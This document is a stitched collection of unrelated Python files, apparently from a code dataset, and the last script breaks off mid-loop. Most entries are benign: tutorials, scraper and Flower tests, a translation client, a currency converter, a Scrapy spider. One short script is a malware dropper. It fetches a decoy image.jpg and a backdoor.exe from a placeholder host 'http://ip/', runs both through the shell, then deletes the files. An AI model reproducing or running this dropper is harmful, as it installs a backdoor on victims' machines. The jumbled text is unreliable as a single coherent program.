mylist[len(mylist) - 1] = mylist[len(mylist) - 1].swapcase()
mylist.append('Ritter Rost')
mylist.insert(0, 'Zimmermann')
print(mylist)
"""
"""
# Ein Tupel (ist unveränderlich)
mytuple = ('Montag', 'Dienstag', 'Mittwoch', 'Donnerstag', 'Freitag', 'Samstag', 'Sonntag')
#print(mytuple[3:6])
"""
"""
# Ein Set (unindexiert und ungeordnet, Elemente sind unveränderlich, können aber vermehrt oder reduziert werden)
myset = {'Adenauer', 'Erhard', 'Kiesinger', 'Brandt', 'Schmidt', 'Kohl', 'Schröder', 'Merkel', 'Schulz'}
myset.remove('Schulz')
myset.add('Kramp-Karrenbauer')
for i in myset:
print(i)
"""
"""
# Ein Dictionary
mydict = {'Mann':'vyras', 'Frau':'moteris','Fisch':'žuvis', 'Biber':'bebras', 'Stadt':'miestas', 'König':'karalius'}
for x, y in mydict.items():
print(x + ' heißt auf Litauisch ' + y)
"""
"""
# Eine Datumsoperation
import time
import datetime
time = time.localtime(time.time())
print(time)
"""
"""
# Eine Funktion
def makeName(forename, surname, title=""):
result = forename + " " + surname
if title:
result = title + " " + result
return result
print(makeName("Hartmut", "Beyer", "Magister artium"))
"""
"""
# Eine Klasse
class Person:
def __init__(self, forename, surname):
self.forename = forename
self.surename = surname
person = Person('Ben', 'Gurion')
print(person.forename)
"""
"""
# Eine Klasse
class Language:
def __init__(self, code):
self.codes = {
"eng":"Englisch",
"ger":"Deutsch",
"fre":"Französisch",
"rus":"Russisch"
}
if code not in self.codes:
self.name = code
return
self.name = self.codes[code]
lang = Language("rus")
print(lang.name)
"""
"""
# Eine Datei aus dem Netz auslesen
import urllib.request as ur
url = "http://diglib.hab.de/edoc/ed000228/1623_06.xml"
fileobject = ur.urlopen(url)
string = fileobject.read()
print(string)
"""
"""
# Eine XML-Datei parsen
import xml.etree.ElementTree as et
tree = et.parse('test.xml')
root = tree.getroot()
nbs = root.findall('.//{http://www.tei-c.org/ns/1.0}rs')
name = ""
for ent in nbs:
if ent.get('type') == 'person':
name = str(ent.text).strip()
ref = str(ent.get('ref')).strip()
print(name + ' - ' + ref)
"""
"""
# Laden und Auslesen einer XML-Datei im Netz
import urllib.request as ur
import xml.etree.ElementTree as et
url = "http://diglib.hab.de/edoc/ed000228/1623_08.xml"
fileobject = ur.urlopen(url)
tree = et.parse(fileobject)
root = tree.getroot()
nbs = root.findall('.//{http://www.tei-c.org/ns/1.0}rs')
name = ""
for ent in nbs:
if ent.get('type') == 'person':
name = str(ent.text).strip()
ref = str(ent.get('ref')).strip()
print(name + ' - ' + ref)
"""
| 3,213 | 1,310 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for scrapername.
'''
import difflib
import filecmp
from datetime import datetime
from os.path import join
from tempfile import gettempdir
import pytest
from hdx.hdx_configuration import Configuration
import hdx.utilities.downloader
from hdx.utilities.compare import assert_files_same
from hdx.utilities.loader import load_json
from src.acled import update_lc_acled, update_ssd_acled
from mapexplorer import get_valid_names
from src.cbpf import update_cbpf
from src.fts import update_fts
#from src.rowca import update_rowca
class TestScraperName:
    """Fixture-driven tests for the map-explorer scrapers (ACLED, FTS, CBPF).

    Each scraper test writes its CSV output into a temp folder and compares
    the result against a checked-in file under tests/fixtures.
    """

    @pytest.fixture(scope='class')
    def configuration(self):
        # Create the shared, read-only HDX configuration once per class.
        Configuration._create(user_agent='test', hdx_read_only=True,
                              project_config_yaml=join('tests', 'config', 'project_configuration.yml'))

    @pytest.fixture(scope='class')
    def folder(self, configuration):
        # Directory the scrapers write their CSV output into.
        return gettempdir()

    @pytest.fixture(scope='class')
    def downloader(self):
        return hdx.utilities.downloader.Download()

    @pytest.fixture(scope='class')
    def today(self):
        # Fixed "current" date so generated output is reproducible.
        return datetime.strptime('2018-01-16', '%Y-%m-%d')

    @pytest.fixture(scope='class')
    def lc_country_list(self, configuration):
        return ['Nigeria']

    @pytest.fixture(scope='class')
    def ssd_country_list(self, configuration):
        return ['South Sudan']

    @pytest.fixture(scope='class')
    def valid_lc_names(self, downloader):
        # Lake Chad place names considered valid, fetched from the configured URL.
        lc_names_url = Configuration.read()['lc_names_url']
        return get_valid_names(downloader, lc_names_url, headers=['ISO', 'Name'])

    @pytest.fixture(scope='class')
    def replace_lc_values(self, downloader):
        # Mapping of raw -> canonical Lake Chad names.
        lc_mappings_url = Configuration.read()['lc_mappings_url']
        return downloader.download_tabular_key_value(lc_mappings_url)

    @pytest.fixture(scope='class')
    def valid_ssd_adm1_names(self, downloader):
        ssd_adm1_names_url = Configuration.read()['ssd_adm1_names_url']
        return get_valid_names(downloader, ssd_adm1_names_url, headers=['Name'])

    @pytest.fixture(scope='class')
    def valid_ssd_adm2_names(self, downloader):
        ssd_adm2_names_url = Configuration.read()['ssd_adm2_names_url']
        return get_valid_names(downloader, ssd_adm2_names_url, headers=['Name'])

    @pytest.fixture(scope='class')
    def replace_ssd_values(self, downloader):
        ssd_mappings_url = Configuration.read()['ssd_mappings_url']
        return downloader.download_tabular_key_value(ssd_mappings_url)

    @pytest.fixture(scope='function')
    def downloaderfts(self):
        # Stub downloader that serves canned FTS API responses from fixture files.
        class Response:
            @staticmethod
            def json():
                pass

        class Download:
            @staticmethod
            def download(url):
                response = Response()
                if url == 'http://lala/plan/country/NGA':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'FTS_plan_NGA.json'))
                    response.json = fn
                elif url == 'http://lala/fts/flow?groupby=plan&countryISO3=NGA':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'FTS_flow_NGA.json'))
                    response.json = fn
                return response

        return Download()

    @pytest.fixture(scope='function')
    def downloaderrowca(self):
        # Stub downloader for the (currently disabled) ROWCA test below.
        class Response:
            @staticmethod
            def json():
                pass

        class Download:
            @staticmethod
            def download(url):
                response = Response()
                if url == 'http://haha/country=3,4,8,9&subcat=4&inclids=yes&final=1&format=json&lng=en':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'ROWCA_population.json'))
                    response.json = fn
                elif url == 'http://haha/country=3,4,8,9&subcat=9,10&inclids=yes&final=1&format=json&lng=en':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'ROWCA_movement.json'))
                    response.json = fn
                return response

        return Download()

    @pytest.fixture(scope='function')
    def downloadercbpf(self):
        # Stub downloader that serves canned CBPF API responses from fixture files.
        class Response:
            @staticmethod
            def json():
                pass

        class Download:
            @staticmethod
            def download(url):
                response = Response()
                if url == 'http://mama/ProjectSummary?poolfundAbbrv=SSD19':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'CBPF_ProjectSummary_SSD.json'))
                    response.json = fn
                elif url == 'http://mama/Location?poolfundAbbrv=SSD19':
                    def fn():
                        return load_json(join('tests', 'fixtures', 'CBPF_Location_SSD.json'))
                    response.json = fn
                return response

        return Download()

    def test_lc_acled(self, folder, today, lc_country_list, valid_lc_names, replace_lc_values):
        # Run the Lake Chad ACLED scraper and compare both output CSVs to fixtures.
        resource_updates = dict()
        filename = 'Lake_Chad_Basin_Recent_Conflict_Events.csv'
        expected_events = join('tests', 'fixtures', filename)
        actual_events = join(folder, filename)
        resource_updates['acled_events'] = {'path': actual_events}
        filename = 'Lake_Chad_Basin_Recent_Conflict_Event_Total_Fatalities.csv'
        expected_fatalities = join('tests', 'fixtures', filename)
        actual_fatalities = join(folder, filename)
        resource_updates['acled_fatalities'] = {'path': actual_fatalities}
        update_lc_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDNigeria.csv?', lc_country_list, valid_lc_names, replace_lc_values, resource_updates)
        assert_files_same(expected_events, actual_events)
        assert_files_same(expected_fatalities, actual_fatalities)

    def test_ssd_acled(self, folder, today, ssd_country_list, valid_ssd_adm2_names, replace_ssd_values):
        # Same as test_lc_acled but for the South Sudan ACLED scraper.
        resource_updates = dict()
        filename = 'South_Sudan_Recent_Conflict_Events.csv'
        expected_events = join('tests', 'fixtures', filename)
        actual_events = join(folder, filename)
        resource_updates['acled_events'] = {'path': actual_events}
        filename = 'South_Sudan_Recent_Conflict_Event_Total_Fatalities.csv'
        expected_fatalities = join('tests', 'fixtures', filename)
        actual_fatalities = join(folder, filename)
        resource_updates['acled_fatalities'] = {'path': actual_fatalities}
        update_ssd_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDSouthSudan.csv?', ssd_country_list, valid_ssd_adm2_names, replace_ssd_values, resource_updates)
        assert_files_same(expected_events, actual_events)
        assert_files_same(expected_fatalities, actual_fatalities)

    def test_fts(self, folder, downloaderfts, lc_country_list):
        # FTS scraper driven entirely by the stubbed downloader above.
        resource_updates = dict()
        filename = 'Lake_Chad_Basin_Appeal_Status.csv'
        expected = join('tests', 'fixtures', filename)
        actual = join(folder, filename)
        resource_updates['fts'] = {'path': actual}
        update_fts('http://lala/', downloaderfts, lc_country_list, resource_updates)
        assert_files_same(expected, actual)

    def test_cbpf(self, folder, today, downloadercbpf, valid_ssd_adm1_names, replace_ssd_values):
        # CBPF scraper driven by the stubbed downloader above.
        resource_updates = dict()
        filename = 'South_Sudan_Country_Based_Pool_Funds.csv'
        expected = join('tests', 'fixtures', filename)
        actual = join(folder, filename)
        resource_updates['cbpf'] = {'path': actual}
        update_cbpf('http://mama/', downloadercbpf, 'SSD19', today, valid_ssd_adm1_names, replace_ssd_values, resource_updates)
        assert_files_same(expected, actual)

    # Disabled along with the src.rowca import at the top of the file.
    # def test_rowca(self, folder, downloaderrowca, valid_lc_names, replace_lc_values):
    # resource_updates = dict()
    # filename = 'Lake_Chad_Basin_Estimated_Population.csv'
    # expected_population = join('tests', 'fixtures', filename)
    # actual_population = join(folder, filename)
    # resource_updates['rowca_population'] = {'path': actual_population}
    # filename = 'Lake_Chad_Basin_Displaced.csv'
    # expected_displaced = join('tests', 'fixtures', filename)
    # actual_displaced = join(folder, filename)
    # resource_updates['rowca_displaced'] = {'path': actual_displaced}
    # update_rowca('http://haha/', downloaderrowca, valid_lc_names, replace_lc_values, resource_updates)
    # assert filecmp.cmp(expected_population, actual_population, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_population, actual_population)
    # assert filecmp.cmp(expected_displaced, actual_displaced, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_displaced, actual_displaced)
# optimizer
# Plain SGD; the step policy below drops the learning rate at epochs 40, 70 and 90.
optimizer = dict(type='SGD', lr=0.001, momentum=0.9, weight_decay=0.001)
optimizer_config = dict(grad_clip=None)  # gradient clipping disabled
# learning policy
lr_config = dict(policy='step', step=[40, 70, 90])
runner = dict(type='EpochBasedRunner', max_epochs=100)  # train for 100 epochs
| 255 | 111 |
""" Advent of Code Day 6 - Signals and Noise"""
with open('inputs/day_06.txt', 'r') as f:
rows = [row.strip() for row in f.readlines()]
flipped = zip(*rows)
message = ''
mod_message = ''
for chars in flipped:
most_freq = ''
least_freq = ''
highest = 0
lowest = 100
for char in chars:
if chars.count(char) > highest:
highest = chars.count(char)
most_freq = char
if chars.count(char) < lowest: # Part Two
lowest = chars.count(char)
least_freq = char
message += most_freq
mod_message += least_freq
# Answer One
print("Error Corrected Message:", message)
# Answer Two
print("Modified Message:", mod_message)
| 708 | 237 |
import hashlib
import json
import os
import pathlib
import shlex
import nbformat
from invoke import task
# Paths passed to `black` by the format task.
files_to_format = ["chmp/src", "tasks.py", "chmp/setup.py"]
# Intersphinx inventory URLs used when building the docs.
inventories = [
    "http://daft-pgm.org",
    "https://matplotlib.org",
    "http://www.numpy.org",
    "https://pandas.pydata.org",
    "https://docs.python.org/3",
    "https://pytorch.org/docs/stable",
]
# Directories whose test suites the `test` task runs.
directories_to_test = ["chmp", "20170813-KeywordDetection/chmp-app-kwdetect"]
@task
def precommit(c):
    """Run the full pre-commit pipeline: format the code, rebuild docs, run tests."""
    format(c)
    docs(c)
    test(c)
@task
def test(c):
    """Run pytest over all configured test directories."""
    run(c, "pytest", *directories_to_test)
@task
def docs(c):
    """Rebuild the API docs and regenerate blog posts from */Post.ipynb notebooks."""
    run(
        c,
        *["python", "-m", "chmp.tools", "mddocs"],
        # Expand every inventory URL into its own --inventory option.
        *(part for inventory in inventories for part in ["--inventory", inventory]),
        *["chmp/docs/src", "chmp/docs"],
    )
    self_path = pathlib.Path(__file__).parent.resolve()
    for p in self_path.glob("*/Post.ipynb"):
        # Convert each notebook into a markdown post next to it.
        run(
            c,
            *["python", "-m", "chmp.tools", "blog"],
            *[str(p), str(p.with_suffix(".md"))],
        )
@task
def format(c):
    """Format the configured source trees with black."""
    run(c, "black", *files_to_format)
@task
def release(c, yes=False):
    """Build the chmp wheel and, after confirmation (or with yes=True), upload it."""
    import packaging.version

    with c.cd("chmp"):
        run(c, "python", "setup.py", "bdist_wheel")
    # Pick the newest wheel by parsed version number, skipping hidden files.
    latest_package = max(
        (
            package
            for package in os.listdir("chmp/dist")
            if not package.startswith(".") and package.endswith(".whl")
        ),
        key=packaging.version.parse,
    )
    if not yes:
        # Interactive safety check: anything other than "y" aborts the upload.
        answer = input(f"upload {latest_package} [yN] ")
        if answer != "y":
            print("stop")
            return
    with c.cd("chmp/dist"):
        run(c, "twine", "upload", latest_package)
def run(c, *args, **kwargs):
    """Shell-quote *args*, join them into a single command line and run it via *c*."""
    command = " ".join(shlex.quote(token) for token in args)
    return c.run(command, **kwargs)
| 1,846 | 682 |
# -*- coding:utf-8 -*-
import requests
import json
import random
import hashlib
# Baidu Translate credentials — fill in before use; keep real values out of VCS.
KEY = ''
APPID = ''
# Endpoint of the Baidu Fanyi general-translation API.
API = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
class translation():
    """One-shot request against the Baidu Translate API.

    Parameters mirror the Baidu API: the source text, the source language
    code and the target language code.
    """

    def __init__(self, src, fromlang, tolang):
        self.src = src
        self.fromlang = fromlang
        self.tolang = tolang

    def trans(self):
        """Call the API and return a '源语言: .../翻译结果: ...' summary string."""
        salt = random.randint(32768, 65535)
        # Baidu request signature: MD5(appid + query + salt + key), hex-encoded.
        sign = APPID + self.src + str(salt) + KEY
        m1 = hashlib.md5()
        # BUG FIX: hashlib requires bytes on Python 3 — encode before hashing
        # (the original passed a str, which raises TypeError on Python 3).
        m1.update(sign.encode('utf-8'))
        sign = m1.hexdigest()
        paras = {
            'q': self.src,
            'from': self.fromlang,
            'to': self.tolang,
            'appid': APPID,
            'salt': salt,
            'sign': sign
        }
        result = requests.get(API, params=paras, timeout=50)
        tdata = json.loads(result.text)
        res_msg = ''
        src = tdata['trans_result'][0]['src']
        dst = tdata['trans_result'][0]['dst']
        # BUG FIX: on Python 3 the original .encode('utf8') calls made the
        # message contain b'...' reprs; interpolate the str values directly.
        res_msg += '源语言: %s\n翻译结果: %s' % (src, dst)
        return res_msg
| 1,016 | 373 |
import bolinette.defaults.models
import bolinette.defaults.mixins
import bolinette.defaults.services
import bolinette.defaults.middlewares
import bolinette.defaults.controllers
import bolinette.defaults.topics
| 210 | 66 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Salvador E. Tropea
# Copyright (c) 2021 Instituto Nacional de Tecnología Industrial
# License: Apache 2.0
# Project: KiCost
# Adapted from: https://github.com/alexprengere/currencyconverter
"""
CurrencyConverter:
This is a reduced version of the 'Currency Converter' by Alex Prengère.
Original project: https://github.com/alexprengere/currencyconverter
This version only supports conversions for the last exchange rates, not
historic ones.
On the other hand this version always tries to get the last rates.
"""
try:
from .default_rates import default_rates, default_date
except ImportError:
# Only useful to bootstrap
default_rates = {}
default_date = ''
from .download_rates import download_rates
# Author information.
__author__ = 'Salvador Eduardo Tropea'
__webpage__ = 'https://github.com/set-soft/'
__company__ = 'INTI-CMNB - Argentina'
class CurrencyConverter(object):
    """Convert amounts between currencies using EUR-based exchange rates.

    The rate table is loaded lazily on first use: the converter tries to
    download fresh rates and falls back to the bundled defaults on failure.
    """

    def __init__(self):
        # Rates are fetched on demand by _do_init().
        self.initialized = False

    def _do_init(self):
        """Load the exchange-rate table once, preferring freshly downloaded rates."""
        if self.initialized:
            return
        self.date, self.rates = download_rates()
        if not self.date:
            # Download failed: fall back to the rates shipped with the package.
            self.date = default_date
            self.rates = default_rates
        self.initialized = True

    def convert(self, amount, currency, new_currency='EUR'):
        """Return *amount* expressed in *new_currency*.

        :param float amount: The amount of `currency` to convert.
        :param str currency: The currency to convert from.
        :param str new_currency: The currency to convert to.
        :raises ValueError: if either currency code is unsupported.
        :rtype: float
        """
        self._do_init()
        unsupported = [c for c in (currency, new_currency) if c not in self.rates]
        if unsupported:
            raise ValueError('{0} is not a supported currency'.format(unsupported[0]))
        source_rate = self.rates[currency]
        target_rate = self.rates[new_currency]
        return float(amount) / source_rate * target_rate
| 2,040 | 618 |
import streamlit as st
import leafmap


def app():
    """Streamlit page: load a CSV of point data from a URL and plot it on a map."""
    st.title("Add vector datasets")

    url = "https://raw.githubusercontent.com/giswqs/data/main/world/world_cities.csv"
    # Text box pre-filled with the sample world-cities CSV.
    in_csv = st.text_input("Enter a URL to a vector file", url)

    m = leafmap.Map()
    if in_csv:
        # Plot the CSV rows as points using its longitude/latitude columns.
        m.add_xy_data(in_csv, x="longitude", y="latitude", layer_name="World Cities")
    m.to_streamlit()
| 385 | 144 |
# -*- coding = utf-8 -*-
# @Time:2021/3/1417:56
# @Author:Linyu
# @Software:PyCharm
from web.pageutils import BooksScore
from web.pageutils import BooksCount
from web.pageutils import pointsDraw
from web.pageutils import scoreRelise
from web.pageutils import messBarInfo
from web.pageutils import tagRader
from web.models import tagThree
from web.wdCloud import infoCloud
from web.priceSpider import spider
from web.models import Dict
from web.models import Modle
from web.priceSpider import spiderDD
# Smoke test using the novel "Fortress Besieged" (围城).
isbn = "'9787020090006'"
# Dangdang search URL, sorted by lowest price; the ISBN keeps its embedded
# single quotes — apparently because the same value is interpolated into SQL
# in the disabled experiments below (TODO confirm).
dd = "http://search.dangdang.com/?key=%s&act=input&sort_type=sort_xlowprice_asc#J_tab"%(isbn)
ddPrice = spiderDD(dd)
print(ddPrice)
# --- Disabled one-off experiments, kept for reference ---
# sql = 'select title from allbook where isbn = %s'%(isbn)
# print(sql)
# testData = Modle().query(sql)
# print(testData[0][0])
# title = "'活着'"
# sqlNum = 'select id_num from corebook where title = %s'%(title)
# id_num = Modle().query(sqlNum)
# print(id_num[0][0])
# print(scoreRelise())
# print(BooksScore())
# print(BooksCount())
# print(pointsDraw())
# messBar()
# print(messBar())
# tagRader()
# tagThree("小说")
# infoCloud('代码大全(第2版)')
# print(spider('9787108009821'))
# dic = Dict()
# for key in dic.keys():
#     print(key)
#     print(dic[key])
| 1,225 | 493 |
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from readability import Document
import datetime
from pprint import pprint
class Articles(scrapy.Item):
    """Scraped news-article fields filled in by BbcSpider.parse_item."""
    url = scrapy.Field()
    title = scrapy.Field()
    author = scrapy.Field()
    published = scrapy.Field()
    body = scrapy.Field()
    agency = scrapy.Field()
class BbcSpider(CrawlSpider):
    """Crawl bbc.com/news and extract Articles items from story pages."""
    name = 'bbc'
    allowed_domains = ['bbc.com']
    start_urls = ['http://bbc.com/news']
    rules = (
        # Follow every link; parse_item decides whether a page is an article.
        Rule(LinkExtractor(), callback='parse_item', follow=True),
    )

    def parse_item(self, res):
        """Return a populated Articles item, or None for pages without a title.

        BUG FIX: the original unconditionally ran `article = Article()` before
        the title check — a NameError on every page, since the item class is
        named `Articles`. The instance is only created when it is needed.
        """
        title = self.get_title(res)
        # Only do further processing if there is a title element in the page.
        if title is None:
            return None
        article = Articles()
        article['url'] = res.url
        article['title'] = title
        article['body'] = self.get_body(res)
        article['published'] = self.get_published(res)
        article['author'] = self.get_author(res)
        article['agency'] = self.get_agency(res)
        return article

    def get_title(self, res):
        """
        Get the title of the article
        """
        title = res.css('h1.story-body__h1 ::text').extract_first()
        return title

    def get_body(self, res):
        """
        Get the actual text of the article
        """
        raw = res.css('div.story-body__inner p ::text')
        body = ''.join(raw.extract())
        return body

    def get_published(self, res):
        """
        Get the article timestamp
        """
        # NOTE(review): extract_first() can return None, which would make
        # int(timestamp) raise — presumably all story pages carry the
        # attribute; verify before hardening.
        timestamp = res.css('div.story-body div.date ::attr(data-seconds)').extract_first()
        published = datetime.datetime.fromtimestamp(int(timestamp))
        return published

    def get_author(self, res):
        """
        Get the author of the article. BBC is somewhat shy about putting a name on articles
        So we just return the string "bbc"
        """
        return 'bbc'

    def get_agency(self, res):
        """
        Get the agency name
        """
        return 'bbc'
| 2,252 | 654 |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django_countries.fields import CountryField
class Profile(models.Model):
    """Extend user model with a country field."""
    # One profile per user; removed together with the user row.
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Optional country; the blank label is shown for the empty select option.
    country = CountryField(blank_label='(select country)', blank=True)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
    """Create a Profile automatically the first time a User is saved."""
    if created:
        Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
    """Persist the related Profile whenever the User is saved."""
    instance.profile.save()
| 698 | 206 |
import os
import sys
import tempfile
import unittest
import subprocess
from unittest.mock import Mock, patch
import mock
from prometheus_client import Histogram
from flower.command import apply_options, warn_about_celery_args_used_in_flower_command, apply_env_options
from tornado.options import options
from tests.unit import AsyncHTTPTestCase
class TestFlowerCommand(AsyncHTTPTestCase):
    """Tests for flower's command-line and environment option parsing."""

    def test_task_runtime_metric_buckets_read_from_cmd_line(self):
        apply_options('flower', argv=['--task_runtime_metric_buckets=1,10,inf'])
        self.assertEqual([1.0, 10.0, float('inf')], options.task_runtime_metric_buckets)

    def test_task_runtime_metric_buckets_no_cmd_line_arg(self):
        apply_options('flower', argv=[])
        self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)

    def test_task_runtime_metric_buckets_read_from_env(self):
        # BUG FIX: the original assigned the variable into os.environ and never
        # removed it, leaking state into any test that runs after this one
        # (e.g. the no-env test below). patch.dict restores the environment on
        # exit, and mock_option restores the global option value.
        with self.mock_option('task_runtime_metric_buckets', Histogram.DEFAULT_BUCKETS):
            with mock.patch.dict(os.environ,
                                 {"FLOWER_TASK_RUNTIME_METRIC_BUCKETS": "2,5,inf"}):
                apply_env_options()
            self.assertEqual([2.0, 5.0, float('inf')], options.task_runtime_metric_buckets)

    def test_task_runtime_metric_buckets_no_env_value_provided(self):
        apply_env_options()
        self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)

    def test_port(self):
        with self.mock_option('port', 5555):
            apply_options('flower', argv=['--port=123'])
            self.assertEqual(123, options.port)

    def test_address(self):
        with self.mock_option('address', '127.0.0.1'):
            apply_options('flower', argv=['--address=foo'])
            self.assertEqual('foo', options.address)

    def test_autodiscovery(self):
        """
        Simulate basic Django setup:
        - creating celery app
        - run app.autodiscover_tasks()
        - create flower command
        """
        celery_app = self._get_celery_app()
        with mock.patch.object(celery_app, '_autodiscover_tasks') as autodiscover:
            celery_app.autodiscover_tasks()
            self.get_app(capp=celery_app)
            self.assertTrue(autodiscover.called)
class TestWarnAboutCeleryArgsUsedInFlowerCommand(AsyncHTTPTestCase):
    """Tests for the warning emitted when celery args follow the flower command."""

    @staticmethod
    def _make_ctx():
        """Build a click-like context whose parent command accepts -A/--app and -b/--broker."""
        app_param = Mock(name='app_param', opts=('-A', '--app'))
        broker_param = Mock(name='broker_param', opts=('-b', '--broker'))

        class FakeContext:
            parent = Mock(command=Mock(params=[app_param, broker_param]))

        return FakeContext()

    @patch('flower.command.logger.warning')
    def test_does_not_log_warning(self, mock_warning):
        # Pure flower arguments must not trigger the warning.
        warn_about_celery_args_used_in_flower_command(
            ctx=self._make_ctx(), flower_args=('--port=5678', '--address=0.0.0.0')
        )
        mock_warning.assert_not_called()

    @patch('flower.command.logger.warning')
    def test_logs_warning(self, mock_warning):
        # Celery-only arguments after `flower` must be reported exactly once.
        warn_about_celery_args_used_in_flower_command(
            ctx=self._make_ctx(), flower_args=('--app=proj', '-b', 'redis://localhost:6379/0')
        )
        mock_warning.assert_called_once_with(
            "You have incorrectly specified the following celery arguments after flower command: "
            "[\'--app\', \'-b\']. Please specify them after celery command instead following"
            " this template: celery [celery args] flower [flower args]."
        )
class TestConfOption(AsyncHTTPTestCase):
    """Tests for the --conf option (config-file discovery and loading)."""

    def test_error_conf(self):
        # Nonexistent config paths — relative and absolute — must raise IOError.
        with self.mock_option('conf', None):
            self.assertRaises(IOError, apply_options,
                              'flower', argv=['--conf=foo'])
            self.assertRaises(IOError, apply_options,
                              'flower', argv=['--conf=/tmp/flower/foo'])

    def test_default_option(self):
        apply_options('flower', argv=[])
        self.assertEqual('flowerconfig.py', options.conf)

    def test_empty_conf(self):
        # /dev/null is a valid (empty) config file and must be accepted.
        with self.mock_option('conf', None):
            apply_options('flower', argv=['--conf=/dev/null'])
            self.assertEqual('/dev/null', options.conf)

    def test_conf_abs(self):
        # A config file given by absolute path is loaded and its settings applied.
        with tempfile.NamedTemporaryFile() as cf:
            with self.mock_option('conf', cf.name), self.mock_option('debug', False):
                cf.write('debug=True\n'.encode('utf-8'))
                cf.flush()
                apply_options('flower', argv=['--conf=%s' % cf.name])
                self.assertEqual(cf.name, options.conf)
                self.assertTrue(options.debug)

    def test_conf_relative(self):
        # Same as above, but the config file is addressed relative to the cwd.
        with tempfile.NamedTemporaryFile(dir='.') as cf:
            with self.mock_option('conf', cf.name), self.mock_option('debug', False):
                cf.write('debug=True\n'.encode('utf-8'))
                cf.flush()
                apply_options('flower', argv=['--conf=%s' % os.path.basename(cf.name)])
                self.assertTrue(options.debug)

    @unittest.skipUnless(not sys.platform.startswith("win"), 'skip windows')
    def test_all_options_documented(self):
        # Compare the number of define() calls in flower/options.py (minus 4
        # internal ones) with the number of documented options in docs/config.rst.
        def grep(patter, filename):
            return int(subprocess.check_output(
                'grep "%s" %s|wc -l' % (patter, filename), shell=True))
        defined = grep('^define(', 'flower/options.py') - 4
        documented = grep('^~~', 'docs/config.rst')
        self.assertEqual(defined, documented,
                         msg='Missing option documentation. Make sure all options '
                             'are documented in docs/config.rst')
| 5,684 | 1,805 |
#!/usr/bin/env python
# SECURITY WARNING(review): this script is a malware "dropper": it downloads a
# decoy image and an executable from a hard-coded host, runs both via the
# shell, then deletes the files. It must never be deployed or distributed —
# retained only so the behavior can be reviewed and removed.
import requests
import subprocess
import os
import tempfile


def download(url):
    # Fetch *url* and write the response body to a file named after the last
    # path segment, in the current working directory.
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://ip/image.jpg")
# Popen does not block, so the image opens while the next download proceeds.
subprocess.Popen("image.jpg", shell=True)
download("http://ip/backdoor.exe")
# call blocks until the executable exits; both files are then removed.
subprocess.call("backdoor.exe", shell=True)
os.remove("image.jpg")
os.remove("backdoor.exe")
| 534 | 187 |
import numpy as np
import cv2
import math
import random
import os
from tempfile import TemporaryFile
from sklearn.model_selection import train_test_split
# Creating classes.
# Every (length, width, colour, angle) combination below defines one of the
# 2*2*2*12 = 96 line classes; 1000 28x28 sample images are drawn per class.
length = [7, 15]
width = [1, 3]
col = []
col.append([0, 0, 255])  # Blue
col.append([255, 0, 0])  # Red
interval = 15
angles = []  # 0, 15, ..., 165 degrees
x = 0
while x < 180:
    angles.append(x)
    x += interval
dirn = 1  # running class-directory index (1..96)
a1 = 0
os.mkdir("/home/aj/Desktop/DL2")
for l in length:
    a2 = 0  # a1 0->7,1->15
    for w in width:
        a3 = 0  # a2 0->1,1->3
        for co in col:
            a4 = 0  # a3 0->red,1->blue
            for ang in angles:
                flag = 0
                m = 0
                os.mkdir("/home/aj/Desktop/DL2/" + str(dirn))
                while flag < 1000:
                    img = np.zeros((28, 28, 3), np.uint8)
                    # Random start point, kept away from the border so the line fits.
                    # NOTE(review): both the x and y ranges use sin(...) —
                    # presumably x should use cos; verify before relying on it.
                    x = random.randrange((28 - math.ceil(l * math.sin(math.radians(180 - ang)))))
                    y = random.randrange((28 - math.ceil(l * math.sin(math.radians(180 - ang)))))
                    endy = y + l * math.sin(math.radians(180 - ang))
                    endy = math.floor(endy)
                    endx = x + l * math.cos(math.radians(180 - ang))
                    endx = math.floor(endx)
                    # Only keep samples whose end point stays inside the canvas.
                    if (0 <= endx <= 28 and 0 <= endy <= 28):
                        cv2.line(img, (x, y), (endx, endy), co, w)
                        flag = flag + 1
                        cv2.imwrite("/home/aj/Desktop/DL2/" + str(dirn) + "/" + str(a1) + "_" + str(a2) + "_" + str(a4) + "_" + str(a3) + "_" + str(flag) + ".png", img)
                dirn += 1
                a4 += 1
            a3 = a3 + 1
        a2 = a2 + 1
    a1 = a1 + 1
outfile = TemporaryFile()
# Creating Frames
train = []
train_class = []
test_class = []
allimg = []
label = []
flag = 0  # class label, incremented once per class directory
# os.mkdir("/home/aj/Desktop/DL2/frames")
for count in range(1, 97):
    f = []
    # os.mkdir("/home/aj/Desktop/DL2/frames/frame_"+str(count))
    f = os.listdir("/home/aj/Desktop/DL2/" + str(count))
    for fi in f:
        # print(fi)
        n = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + fi)
        n = n.reshape(2352)  # flatten 28*28*3
        allimg.append(n)
        label.append(flag)
    flag += 1
    for i in range(0, 10):
        # Tile 9 consecutive samples of the class into one 84x84 "frame" image.
        img1 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i], 1)
